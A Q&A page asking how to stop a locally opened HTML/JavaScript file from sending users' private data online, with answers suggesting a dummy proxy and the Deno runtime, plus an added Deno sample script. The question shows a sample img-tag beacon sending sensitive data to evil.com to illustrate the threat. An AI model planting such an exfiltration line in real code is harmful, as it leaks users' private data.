How to prevent html in file:/// from accessing internet?

Time:01-16

The background scenario is that I want to give my users a JavaScript which they can use to analyze their sensitive private data, and I want them to feel safe that this data will not be sent to the internet. Initially, I thought I'll just distribute it as an .html file with an embedded <script>, and that they'll just run this .html file in the browser over the file:/// protocol, which gives some nice same-origin policy defaults. But this won't really offer much security to my users: a JavaScript could easily create an <img src="https://evil.com?sensitive-data=${XYZ}"> tag which would send a GET request to evil.com, despite evil.com being a different origin, because by design embedding of images from different origins is allowed.

Is there some practical way in which I could distribute my JavaScript, and/or for the end user to run such a script, so they could be reasonably sure it can't send the data over the internet? (Unplugging the machine from the internet, installing a VM, or manipulating firewall settings are not practical.) (Reasonably sure = assuming that the software they use, such as the browser, follows the spec and wasn't hacked.)

CodePudding user response:

Setting up the browser proxy in settings to localhost:DUMMY_PORT looks like a safe solution for this case.

CodePudding user response:

Deno is, to cite its website:

Deno is a simple, modern and secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust.

  • Secure by default. No file, network, or environment access, unless explicitly enabled.

So, this reduces the trust of the user to the trust in Deno (and in Chocolatey if they want to use choco install deno to install Deno).
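
An added example, not part of the answer above or of the Deno project: a sketch of an analysis script meant to be started with no permission flags (`deno run analyze.js < data.csv`), which reads the data from stdin and refuses to process it if it was launched with network access. The file name `analyze.js`, the `name,amount` CSV layout and the function names are assumptions; the enforcement itself comes from Deno's permission model, and the in-script check only catches a user who adds `--allow-net` by mistake.

```javascript
// Added example. Assumed invocation:  deno run analyze.js < data.csv
// No --allow-net, --allow-read or --allow-env is passed; stdin needs no permission.

// Pure analysis step: sums the second column of "name,amount" lines (assumed layout).
function analyze(text) {
  let rows = 0;
  let total = 0;
  for (const line of text.split(/\r?\n/)) {
    const amount = Number(line.split(",")[1]);
    if (line.trim() !== "" && Number.isFinite(amount)) {
      rows += 1;
      total += amount;
    }
  }
  return { rows, total };
}

// Asks the runtime whether network access was granted at start-up.
// `permissions` is Deno.permissions in real use; it is a parameter so the
// check can be exercised with a stub outside Deno.
async function networkIsBlocked(permissions) {
  const status = await permissions.query({ name: "net" });
  return status.state !== "granted"; // "prompt" and "denied" both mean: not granted
}

async function main(deno) {
  if (!(await networkIsBlocked(deno.permissions))) {
    console.error("Started with network access; re-run without --allow-net.");
    return 1;
  }
  // Read all of stdin; nothing is fetched or written anywhere.
  const text = await new Response(deno.stdin.readable).text();
  console.log(JSON.stringify(analyze(text)));
  return 0;
}

// Only runs under Deno; in other runtimes the functions are just defined.
if (typeof Deno !== "undefined") {
  main(Deno).then((code) => Deno.exit(code));
}
```

If the script tried a network call anyway, Deno would deny it or ask the user interactively, so the user is trusting the runtime rather than the script.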
